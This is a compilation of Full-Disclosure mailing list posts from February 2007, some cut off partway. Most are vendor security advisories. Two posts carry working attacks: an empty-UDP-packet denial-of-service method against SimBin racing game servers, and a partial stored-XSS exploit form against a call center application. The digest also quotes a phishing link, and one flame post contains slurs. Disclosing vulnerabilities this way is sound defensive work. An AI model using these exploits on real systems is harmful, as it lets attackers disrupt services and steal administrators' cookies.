[Full-disclosure] Overtaking Google Desktop
Hello, A new research from Watchfire has revealed a serious vulnerability in Google Desktop. The attack, which is fully presented in a new Watchfire research paper released today (available at http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf), can allow a malicious individual to achieve not only remote, persistent access to sensitive data, but in some cases full system control as well. Google Desktop is a popular freeware desktop search tool which offers powerful indexing abilities along with an easy to use interface. In many cases, Google Desktop manages highly sensitive information. Therefore, the impact of a security breach in it is far-reaching. Google Desktop contains several protection mechanisms to secure its indexed data against remote intruders. In this paper, we present a step-by-step attack flow that circumvents Google Desktop's protection mechanisms and allows a malicious attack to take place against Google Desktop users. The attack is composed of web-application security flaws found in Google Desktop along with exploitation of Google Desktop's tight integration with the Google.com website. The paper shows that it is possible to achieve a remote and persistent access to sensitive data on attacked systems. In addition, under certain conditions, it is also possible to covertly inject and execute malicious applications on attacked systems, using Google Desktop's own features. The full paper can be found in the following link: http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf A demonstration of the attack flow can be found at the same page or at the following link: http://download.watchfire.com/googledesktopdemo/index.htm Note: - The Google Desktop security flaw was coordinated with the Google Security Team. Google has been responsive and recently issued a patch which mitigates the risk of the attack. We highly recommend all Google Desktop users to make sure they have an updated version installed on their system. This vulnerability was discovered by me with the cooperation of Danny Allan and Adi Sharabani. Best regards, Yair Amit Security Team Watchfire (Israel) Ltd. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:044 ] - Updated ekiga packages fix string vulnerabilities.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:044 http://www.mandriva.com/security/ ___ Package : ekiga Date: February 21, 2007 Affected: 2007.0 ___ Problem Description: A format string flaw was discovered in how ekiga processes certain messages, which could permit a remote attacker that can connect to ekiga to potentially execute arbitrary code with the privileges of the user running ekiga. Updated package have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1006 ___ Updated Packages: Mandriva Linux 2007.0: 949ddb13d6ec406dda15989adfa6a8a6 2007.0/i586/ekiga-2.0.3-1.1mdv2007.0.i586.rpm 301e55e46ec28ec2f6bb3371e4954f71 2007.0/SRPMS/ekiga-2.0.3-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 206cffc2e041ffa98edcfa982fd42c14 2007.0/x86_64/ekiga-2.0.3-1.1mdv2007.0.x86_64.rpm 301e55e46ec28ec2f6bb3371e4954f71 2007.0/SRPMS/ekiga-2.0.3-1.1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF3DA7mqjQ0CJFipgRAnkFAKCX10O4kcIxm47jpVnsoN7cZEjK0ACgq40S VcfNLes5PA5PfaTp0lh208s= =u9PN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:045 ] - Updated gnomemeeting packages fix string vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:045 http://www.mandriva.com/security/ ___ Package : gnomemeeting Date: February 21, 2007 Affected: Corporate 3.0 ___ Problem Description: A format string flaw was discovered in how GnomeMeeting processes certain messages, which could permit a remote attacker that can connect to GnomeMeeting to potentially execute arbitrary code with the privileges of the user running GnomeMeeting. Updated package have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1007 ___ Updated Packages: Corporate 3.0: 15e2472f2e41ab47d507cfb491d7a28d corporate/3.0/i586/gnomemeeting-0.98.5-5.1.C30mdk.i586.rpm 0e1008ad8663cf490f7fe9bffddcf05c corporate/3.0/SRPMS/gnomemeeting-0.98.5-5.1.C30mdk.src.rpm Corporate 3.0/X86_64: dfb6e715109f6134a3a8497de10fa75e corporate/3.0/x86_64/gnomemeeting-0.98.5-5.1.C30mdk.x86_64.rpm 0e1008ad8663cf490f7fe9bffddcf05c corporate/3.0/SRPMS/gnomemeeting-0.98.5-5.1.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF3DGFmqjQ0CJFipgRAto9AJ9UnhPuzkVqtUeDheOHHd8zAUGu/wCgxAeu dK0uxHb8mIjKNYXPA6fnAG8= =w/zI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Security Advisory 02.15.07: Multiple Vendor ClamAV CAB File Denial of Service Vulnerability
On 2/15/07, iDefense Labs [EMAIL PROTECTED] wrote: The discoverer of this vulnerability wishes to remain anonymous. And the reason can be found here: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=133 Great discovery! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bank of America [phising email]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Got an email today that was crafted to look like it came from Bank of America, the message contained the following: Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account. So we have decided to put an extra verification process to ensure your identity and your account security. Please click on A href=http://www.candy-pop.com/www.bankofamerica.com/BOA/sslencrypt218bit/online_banking/index.htm; target=_blanksign in to Online Banking/A to continue to the verification process and ensure your account security. It is all about your security. Thank you, and visit the customer service section. Which of course loads a phishing page that would capture login credentials should anyone fall for the ruse. This may be old news though and possibly related to another story I read earlier on Zone-H here: http://www.zone-h.org/content/view/14577/31/ Troy Cregger Lead Developer, Technical Products. Kennedy Information, Inc One Phoenix Mill Ln, Fl 3 Peterborough, NH 03458 (603)924-0900 ext 662 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF3HPLnBEWLrrYRl8RAmPbAJsEhggVS+bHdwHYAi6Zrax+azPPXwCfd2T8 gKSsfPlF/9a+kPWEYacykVg= =aepj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-424-1] PHP vulnerabilities
=== Ubuntu Security Notice USN-424-1 February 21, 2007 php5 vulnerabilities CVE-2007-0906, CVE-2007-0907, CVE-2007-0908, CVE-2007-0909, CVE-2007-0910, CVE-2007-0988 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libapache2-mod-php5 5.0.5-2ubuntu1.7 php5-cgi 5.0.5-2ubuntu1.7 php5-cli 5.0.5-2ubuntu1.7 php5-common 5.0.5-2ubuntu1.7 php5-odbc5.0.5-2ubuntu1.7 Ubuntu 6.06 LTS: libapache2-mod-php5 5.1.2-1ubuntu3.5 php5-cgi 5.1.2-1ubuntu3.5 php5-cli 5.1.2-1ubuntu3.5 php5-common 5.1.2-1ubuntu3.5 php5-odbc5.1.2-1ubuntu3.5 Ubuntu 6.10: libapache2-mod-php5 5.1.6-1ubuntu2.2 php5-cgi 5.1.6-1ubuntu2.2 php5-cli 5.1.6-1ubuntu2.2 php5-common 5.1.6-1ubuntu2.2 php5-odbc5.1.6-1ubuntu2.2 After a standard system upgrade you need to restart Apache or reboot your computer to effect the necessary changes. Details follow: Multiple buffer overflows have been discovered in various PHP modules. If a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906) The sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907) The wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information. (CVE-2007-0908) On 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909) Under certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910) When unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988) Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.7.diff.gz Size/MD5: 116000 e86f9657167213b8990f391018b28e8e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.7.dsc Size/MD5: 1707 4eaf5e7ccc2304836f7c55a64857c145 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5.orig.tar.gz Size/MD5: 6082082 ae36a2aa35cfaa58bdc5b9a525e6f451 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.0.5-2ubuntu1.7_all.deb Size/MD5: 173668 f6caf8c382ba778c934b7c3887915f61 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.7_all.deb Size/MD5: 1038 7c8598ce989a1c332b46e35612c91c75 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.7_amd64.deb Size/MD5: 2013456 c880acf90d178e1a9d98c057ed7249f6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.7_amd64.deb Size/MD5: 3973284 d5e93a66ef95932b09def89eda235ee4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.7_amd64.deb Size/MD5: 1997666 bf210464dcd8ed1741738eba04bcbc07 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.7_amd64.deb Size/MD5: 129448 cbee1361dde06ec76409ab4bbcd7aaa5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.7_amd64.deb Size/MD5:24030 1aec1820973c2cf1dd07347d4d65c72c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.7_amd64.deb Size/MD5: 218754 aa8e3985db053cfada200812f1261f57 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.7_amd64.deb
[Full-disclosure] Cisco Security Advisory: Cisco Unified IP Conference Station and IP Phone Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Unified IP Conference Station and IP Phone Vulnerabilities Advisory ID: cisco-sa-20070221-phone http://www.cisco.com/warp/public/707/cisco-sa-20070221-phone.shtml Revision 1.0 For Public Release 2007 February 21 1600 UTC (GMT) - - Summary === Certain Cisco Unified IP Conference Station and IP Phone devices contain vulnerabilities which may allow unauthorized users to gain administrative access to vulnerable devices. Cisco Unified IP Conference Station Administrative Bypass Vulnerability Cisco Unified IP Conference Station 7935 and 7936 devices do not require a password when a URL is accessed directly via the administrator HTTP interface. There is a workaround for this vulnerability. Cisco Unified IP Phone Default Account and Privilege Escalation Vulnerabilities Cisco Unified IP Phone 7906G, 7911G, 7941G, 7961G, 7970G and 7971G devices contain a hard coded default user account with a default password which is remotely accessible via a Secure Shell (SSH) server enabled on the phone. This default user account may be leveraged to gain administrative access to a vulnerable phone via a privilege escalation vulnerability. The default user account may also execute commands causing a phone to become unstable and result in a denial of service. The default user account can not be disabled, removed or have its password changed. There are mitigations available for these vulnerabilities. Cisco has made free software available to address these issues for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070221-phone.shtml Affected Products = This section provides details on affected products. Vulnerable Products +-- This section provides details on vulnerable products. Cisco Unified IP Conference Station +-- +---+ | Model | Affected Firmware Version | |+--| | 7935 | 3.2(15) and earlier | |+--| | 7936 | 3.3(12) and earlier | +---+ Cisco Unified IP Phone +- +---+ | Model | Firmware Version | |-+-| | 7906G | 8.0(4)SR1 and earlier | |-+-| | 7911G | 8.0(4)SR1 and earlier | |-+-| | 7941G | 8.0(4)SR1 and earlier | |-+-| | 7961G | 8.0(4)SR1 and earlier | |-+-| | 7970G | 8.0(4)SR1 and earlier | |-+-| | 7971G | 8.0(4)SR1 and earlier | +---+ The version of firmware running on an IP phone can be determined via the Settings menu on a phone. In most deployments, Cisco Unified CallManager (CUCM) can also be used to accurately determine the version of firmware that is supposed to be running on an IP phone. While CUCM maintains a record of the firmware it last deployed to an IP phone, it is possible for a user to change the firmware version on an IP phone. Products Confirmed Not Vulnerable + Cisco Unified IP Phone 7902G, 7905, 7905G, 7910, 7912, 7912G, 7920, 7921G, 7940, 7960 and 7985 devices are not vulnerable to the default account and privilege escalation vulnerability. No other Cisco products are known to be vulnerable. Details === Cisco Unified IP Conference Station Administrative Bypass Vulnerability + Cisco Unified IP Conference Station 7935 and 7936 devices provide integrated speaker phone services for a networked environment. 7935/ 7936 devices can be managed via an administrative HTTP interface and/ or a with Cisco Unified CallManager (CUCM) system. The administrative HTTP interface is protected by a user configurable password. If a user knows the direct path to a management URL, it may be possible to access the administrative HTTP interface without being prompted for authentication. The vulnerability occurs because vulnerable IP Conference Station devices incorrectly maintain the state of administrator login sessions. If an administrator logs into a vulnerable device via the HTTP interface, the administrator's credentials will be cached even after the administrator logs out of the device. This leaves a window of opportunity for an unauthorized user to gain complete administrative access to a vulnerable device. If an administrator never accesses a potentially vulnerable device via the HTTP interface, the device is not vulnerable to the authentication bypass attack. It is possible to reset to an IP Conference Station to a non
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in 802.1X Supplicant
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in 802.1X Supplicant Advisory ID: cisco-sa-20070221-supplicant http://www.cisco.com/warp/public/707/cisco-sa-20070221-supplicant.shtml Revision 1.0 For Public Release 2007 February 21 1600 UTC (GMT) - --- Summary === The Cisco Secure Services Client (CSSC) is a software client that enables customers to deploy a single authentication framework using the 802.1X authentication standard across multiple device types to access both wired and wireless networks. A lightweight version of the CSSC client is also a component of the Cisco Trust Agent (CTA) within the Cisco Network Admission Control (NAC) Framework solution. These products are affected by multiple vulnerabilities including privilege escalations and information disclosure. Cisco has made free software available to address these vulnerabilities for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070221-supplicant.shtml. Affected Products = This section provides details on affected products. Vulnerable Products +-- Any version of the following software clients, prior to the versions which are listed in the Software Versions and Fixes section below, may be vulnerable. * Cisco Secure Services Client 4.x versions * Cisco Trust Agent 1.x and 2.x versions * Meetinghouse AEGIS SecureConnect Client (Windows platform versions) * Cisco Security Agent (CSA) bundle versions 5.0 and 5.1 To determine the version of the Cisco Trust Agent installed, the ctastat command found in the \Program Files\Cisco Systems\CiscoTrustAgent directory will provide output similar to: Cisco Trust Agent Statistics Current Time: Tue Sep 27 19:11:18 2005 CTA Version: 2.0.0.26 To determine the version of the Cisco Secure Services Client installed, the software version information may be found in About dialog window which may be launched underneath the Help tab within the client. Cisco Security Agent bundle versions 5.0 and 5.1 included Cisco Trust Agent software within the bundle. Customers who have deployed CTA as part of their CSA client package may be vulnerable if the version of CTA included is a version which is affected. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by these vulnerabilities. Details === The Cisco Secure Services Client (CSSC) is a software client that enables customers to deploy a single authentication framework using the 802.1X authentication standard across multiple device types to access both wired and wireless networks. Previously this product was marketed as the Meetinghouse AEGIS SecureConnect client. Cisco Trust Agent (CTA) installed on end-hosts is a core component of the Cisco Network Admission Control (NAC) Framework solution. CTA optionally includes a lightweight version of CSSC to provide authentication as part of the NAC Framework solution, using the network infrastructure to enforce security policy compliance on all devices seeking to access network computing resources. Both products are affected by multiple vulnerabilities including privilege escalations and password disclosure. Privilege Escalations + Four privilege escalation vulnerabilities exist in both products. * It is possible for an unprivileged user who is logged into the computer to increase their privileges to the local system user via the help facility within the supplicant Graphical User Interface (GUI). This vulnerability is documented by Cisco Bug ID CSCsf14120 * An unprivileged user who is logged into the computer is able to launch any program on a system to run with SYSTEM privileges from within the supplicant application. This vulnerability is documented by Cisco Bug ID CSCsf15836 * Insecure default Discretionary Access Control Lists (DACL) for the connection client GUI (ConnectionClient.exe) allows an unprivileged user to inject a thread under ConnectionClient.exe running with SYSTEM level privileges. This vulnerability is documented by Cisco Bug ID CSCsg20558 * Due to the method used in parsing commands, it is possible that an unprivileged user who is logged into the computer could launch a process as the local system user. This vulnerability is documented by Cisco Bug IDs CSCsh30297 and CSCsh30624 Password Disclosure +-- With authentication methods which convey a password in a protected tunnel the users password will be logged in cleartext in the application log files described below (assuming default installation paths). This will occur with the following methods: * TTLS CHAP * TTLS MSCHAP * TTLS MSCHAPv2 * TTLS PAP * MD5 * GTC * LEAP * PEAP MSCHAPv2 * PEAP GTC * FAST CTA Wired
[Full-disclosure] Players disconnection in Simbin racing games
### Luigi Auriemma Applications: games developed by SimBin Development Team http://www.simbin.se Versions: GTR - FIA GT Racing Game = 1.5.0.0 http://www.gtr-game.com GT Legends = 1.1.0.0 http://www.gt-legends.com GTR 2 = 1.1 http://www.gtr-game.com RACE - The WTCC Game= 1.0 (0.6.3.0?) http://www.race-game.org Platforms:Windows Bug: clients disconnection Exploitation: remote, versus clients Date: 21 Feb 2007 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === Simbin is a well known software house specialized in the developing of racing games deeply devopted to extreme simulation. All their games are very recent, GTR was released in November 2004 while Race WTCC exactly two years later. ### == 2) Bug == The problem is very simple, an UDP packet of zero bytes (empty) sent to the main port of the server (usually 48942 for Race WTCC and 34297 for the other games) forces the disconnection of all the clients connected to it. The attacker needs only to send one packet (spoofing possible) and the clients in the game will be immediately kicked with the message Lost connection with the Host. Then they can re-join again... but can be re-kicked in the same way too. ### === 3) The Code === - get udpsz from here: http://aluigi.org/testz/udpsz.zip - launch it versus the server: udpsz 127.0.0.1 34297 0 for GTR, GTR2 and GT Legends udpsz 127.0.0.1 48942 0 for Race WTCC - check what happened to the clients connected to it ### == 4) Fix == No fix. No reply received from the developers. ### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
Weakness in Full Disclosure mailing list allows morons to flourish Vulnerable: The entire mailing list Severity: Critic-Ill Classification: Loser Validation BugTraq-ID: TBA CVE-Number: TBA Remote Exploit: YUP Local Exploit: YUP Vendor URL: http://lists.grok.org.uk Author: Mai Long Wang Scheduled Release date: Feb 21st, 2007 Notifications: Right now retard Problem: By keeping an unmoderated mailing list, Full Disclosure has introduced the security community to insane amount of idiots who think that downloading any and all PHP based software then running: for i in `find . -name *.php` do grep phpinfo $i echo eye can hax0r1ze y0ur bl0g done This issue has become increasingly disturbing as idiots from all over the world have not been able to differentiate themselves between mules (aka asses) from real hackers. Full disclosure has also introduced other types of clowns who spam up legitimate users' email boxes with moronic responses fired off in desperation in attempts to boost the clown's ego. Vendor Response: None. Vendor is also clueless Solution: Introduce a security mailing list for professionals that is moderated, its users have been validated, and the typical response will not be: Sh4r j00 fackinG luzer. I pwned your php webserver with my lam3 ass 0day Did j0o s33 how I hax0rfied their server Mustafa! Praises be due to allah! Joo facking Jews. I said so therefore it is! mYe SiGnAtUrE iS r33t wAiT tILL eYe sh0w mYe Netzero and AOL gaytarded buddies I can hax0r! Workaround: Filter luzers' email addresses Credit: Old schoolers who know damn well where this advisory is coming from. Greets: Greets go out to the dinosaurs no longer on the scene. Those on the scene... You know where to find me. Copyright: Copytheft (c) 2007 x to the p zero This report should be copied and redistributed to the idiots on this list whenever possible in attempts to get them to finally shut their damn mouths in efforts to minimize the nonsense filling my email ebox. Additional thoughts on minimizing the amount of idiocy would be taking a stick and using some of these idiots as a party Pinata. This report is intended to make users think before they shoot off dumb ass messages no one gives a flying fuck about. Moderators are asked to do something productive which is called moderate. Idiots are also asked to be productive and swallow a gallon of Liquid Drano before bedtime. Parents are also asked to monitor their little rejects and give the some attention so they can stop playing hax0rs and giving security professionals a bad rap when the word hacker comes into a business conversation. It's been too long that the mention of the word hacker sets of unwarranted paranoia. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
Full disclosure has also introduced other types of clowns who spam up legitimate users' email boxes with moronic responses fired off in desperation in attempts to boost the clown's ego. Should the irony of the fact that this is exactly what you just did be lost on me? On Wed, 21 Feb 2007, Mofo Haxsor wrote: Date: Wed, 21 Feb 2007 12:25:28 -0500 From: Mofo Haxsor [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz Weakness in Full Disclosure mailing list allows morons to flourish Vulnerable: The entire mailing list Severity: Critic-Ill Classification: Loser Validation BugTraq-ID: TBA CVE-Number: TBA Remote Exploit: YUP Local Exploit: YUP Vendor URL: http://lists.grok.org.uk Author: Mai Long Wang Scheduled Release date: Feb 21st, 2007 Notifications: Right now retard Problem: By keeping an unmoderated mailing list, Full Disclosure has introduced the security community to insane amount of idiots who think that downloading any and all PHP based software then running: for i in `find . -name *.php` do grep phpinfo $i echo eye can hax0r1ze y0ur bl0g done This issue has become increasingly disturbing as idiots from all over the world have not been able to differentiate themselves between mules (aka asses) from real hackers. Full disclosure has also introduced other types of clowns who spam up legitimate users' email boxes with moronic responses fired off in desperation in attempts to boost the clown's ego. Vendor Response: None. Vendor is also clueless Solution: Introduce a security mailing list for professionals that is moderated, its users have been validated, and the typical response will not be: Sh4r j00 fackinG luzer. I pwned your php webserver with my lam3 ass 0day Did j0o s33 how I hax0rfied their server Mustafa! Praises be due to allah! Joo facking Jews. I said so therefore it is! mYe SiGnAtUrE iS r33t wAiT tILL eYe sh0w mYe Netzero and AOL gaytarded buddies I can hax0r! Workaround: Filter luzers' email addresses Credit: Old schoolers who know damn well where this advisory is coming from. Greets: Greets go out to the dinosaurs no longer on the scene. Those on the scene... You know where to find me. Copyright: Copytheft (c) 2007 x to the p zero This report should be copied and redistributed to the idiots on this list whenever possible in attempts to get them to finally shut their damn mouths in efforts to minimize the nonsense filling my email ebox. Additional thoughts on minimizing the amount of idiocy would be taking a stick and using some of these idiots as a party Pinata. This report is intended to make users think before they shoot off dumb ass messages no one gives a flying fuck about. Moderators are asked to do something productive which is called moderate. Idiots are also asked to be productive and swallow a gallon of Liquid Drano before bedtime. Parents are also asked to monitor their little rejects and give the some attention so they can stop playing hax0rs and giving security professionals a bad rap when the word hacker comes into a business conversation. It's been too long that the mention of the word hacker sets of unwarranted paranoia. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Call Center Software - Remote Xss Post Exploit -
-=[ADVISORY---]=- Call center 0,93 Author: CorryL[EMAIL PROTECTED] -=[---]=- -=[+] Application:Call senter -=[+] Version:0,93 -=[+] Vendor's URL: http://www.call-center-software.org/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.xoned.net -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. Call center software is one of the most important aspects of any call help center, being able to track and manage calls can be the key to high customer safisfacation. Our 100% free call center software solution is based on php and the mysql database. ..::[ Bug ]::.. An attacker exploiting this vulnerability is able steal the content the cookies of the consumer admin in fact the bug situated is on an request post then he remains memorized inside the database in attends him that the admin goes to read the content of the call ..::[Exploit]::.. html head titleCall Center/title meta http-equiv=Content-Type content=text/html; charset=iso-8859-1 link rel=stylesheet href=helpdesk.css type=text/css /head body table bgcolor=#FF width=100% tr td align=center form method=post action=http://remote_server/path/call_entry.php; table border=0 tr th class=ttitleAdding Call/th /tr tr td table width=100% border=0 cellspacing=0 cellpadding=3 tr td align=rightName:nbsp;/tdtd align=leftinput type=text name=name Value=H4ck3rsize=30/td /tr tr td align=rightPhone:nbsp;/tdtd align=leftinput type=text name=phone value=111-555-555 size=20/td /tr tr td align=rightDepartment:nbsp;/td td select name=department_id option value=1Problem/option /select /td /tr tr td align=rightIssue Type:nbsp;/td td select name=issue_id option value=6email/option option value=2keyboard/option option value=3monitor/option option value=5mouse/option option value=4network/option option value=8password/option
[Full-disclosure] [ MDKSA-2007:047 ] - Updated kernel packages fix multiple vulnerabilities and bugs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:047 http://www.mandriva.com/security/ ___ Package : kernel Date: February 21, 2007 Affected: 2007.0 ___ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: A double free vulnerability in the squashfs module could allow a local user to cause a Denial of Service by mounting a crafted squashfs filesystem (CVE-2006-5701). The zlib_inflate function allows local users to cause a crash via a malformed filesystem that uses zlib compression that triggers memory corruption (CVE-2006-5823). The key serial number collision avoidance code in the key_alloc_serial function in kernels 2.6.9 up to 2.6.20 allows local users to cause a crash via vectors thatr trigger a null dereference (CVE-2007-0006). The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels immediately and reboot to effect the fixes. In addition to these security fixes, other fixes have been included such as: - New drivers: nozomi, UVC - Fixed SiS SATA support for chips on 966/968 bridges - Fixed issues in squashfs by updating to 3.2 (#27008) - Added support for SiS968 bridgest to the sis190 bridge - Fixed JMicron cable detection - Added /proc/config.gz support and enabled kexec on x86_64 - Other minor fixes To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5823 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0006 ___ Updated Packages: Mandriva Linux 2007.0: 07df9cceca48092bca1fd65cadf91e69 2007.0/i586/kernel-2.6.17.11mdv-1-1mdv2007.0.i586.rpm a1dbf1afa75579198166a3f4a74f45d5 2007.0/i586/kernel-doc-2.6.17.11mdv-1-1mdv2007.0.i586.rpm da3d2669e324068dd7563a29356a6221 2007.0/i586/kernel-enterprise-2.6.17.11mdv-1-1mdv2007.0.i586.rpm 1e1508188ec35415a880978c3c90c7ce 2007.0/i586/kernel-legacy-2.6.17.11mdv-1-1mdv2007.0.i586.rpm 2d0f1e67c091bd9c62cb4f63b9ef7356 2007.0/i586/kernel-source-2.6.17.11mdv-1-1mdv2007.0.i586.rpm d76607bf4889d5a6d0a3633a84475684 2007.0/i586/kernel-source-stripped-2.6.17.11mdv-1-1mdv2007.0.i586.rpm d6d3e09457c438b71cb03d3622867019 2007.0/i586/kernel-xen0-2.6.17.11mdv-1-1mdv2007.0.i586.rpm 241b7b83709ec8811fb8b2969ae5bfda 2007.0/i586/kernel-xenU-2.6.17.11mdv-1-1mdv2007.0.i586.rpm b971ee2fe8d6ddc83765cb2705671e35 2007.0/SRPMS/kernel-2.6.17.11mdv-1-1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7293720ba20f54c1522263b0d1e58577 2007.0/x86_64/kernel-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm 7a32b034b1452b1d102fed6fca411aa2 2007.0/x86_64/kernel-doc-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm db02f60611db9824215440969b52d2ac 2007.0/x86_64/kernel-source-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm 4751c8e5fb383bf08f29f172bc1c11f2 2007.0/x86_64/kernel-source-stripped-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm e467c45bdab2bfc663b0b0a0ab135d84 2007.0/x86_64/kernel-xen0-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm 9c00e25c5f5ea6be9d96c4a2139836a6 